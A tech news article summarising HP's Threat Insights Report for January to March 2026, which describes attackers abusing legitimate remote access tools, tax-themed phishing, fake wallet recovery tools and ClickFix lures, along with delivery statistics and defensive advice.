- Legitimate software is now the most dangerous weapon in a hacker’s arsenal, HP warns
- Tax deadline phishing emails are opening doors that security scanners never flag
- Fake dating app downloads are delivering full remote access to attackers instantly
Cybercriminals are exploiting legitimate remote access applications such as LogMeIn and ScreenConnect to take control of victim devices without triggering standard security alerts, experts have warned.
HP‘s latest Threat Insights Report, covering January through March 2026, documents how attackers are deliberately blending malicious activity into normal IT behavior to avoid detection.
The report draws on data from millions of endpoints running HP Wolf Security across the period under review, and found the campaigns follow a consistent pattern built around social engineering rather than technical exploits.
How trust becomes the weapon
Legitimate software becomes the perfect disguise precisely because security tools are least likely to flag applications they already recognize and trust.
When an attacker controls a familiar remote access tool on a victim’s device, nothing in the security stack raises an alarm.
That invisibility starts at the very first step — attackers used tax year-end phishing emails and fake desktop application downloads, including fraudulent dating website installers, to persuade users into installing remote access tools that they control.
Once installed, those tools gave attackers total device control while appearing indistinguishable from routine IT activity.
“What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” said Patrick Schläpfer, Principal Threat Researcher at HP Security Lab.
“By combining trusted software with carefully designed social engineering — tied to events like the end of the tax year — it’s getting even harder to distinguish what can and can’t be trusted.”
Separate campaigns uncovered in the same period used fake cryptocurrency wallet recovery tools distributed through code-sharing platforms and media download sites.
Those tools, rather than helping users recover lost wallets, harvested credentials, wallet data, and system information before packaging everything into archive files for exfiltration.
The emoji-heavy scripts used in these attacks showed characteristics consistent with AI-assisted coding.
This suggests that vibe coding tools are now lowering the barrier for building functional malware.
Malware hides in plain sight
HP’s report also documented ClickFix campaigns disguising malware as audio files through convincing fake websites and realistic CAPTCHA prompts.
Victims unknowingly execute the malicious code in the background while believing they were completing routine security checks.
At least 11% of email threats identified by HP Wolf Security during the period bypassed one or more email gateway scanners entirely.
Executable files accounted for the largest share of malware delivery at 39%, followed by archive files at 38% and PDF documents at 10%.
“These attacks don’t look like break-ins — they look like business as usual, blending in with normal IT activity and avoiding the warning signs associated with malware,” said Alex Holland, Principal Threat Researcher at HP Security Lab
Holland added that organizations should restrict unnecessary privileges, control software installation, and isolate risky activity such as downloads and unknown links.
Enterprise security teams are advised to adjust their defenses to account for attacks that look legitimate, rather than suspicious.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.
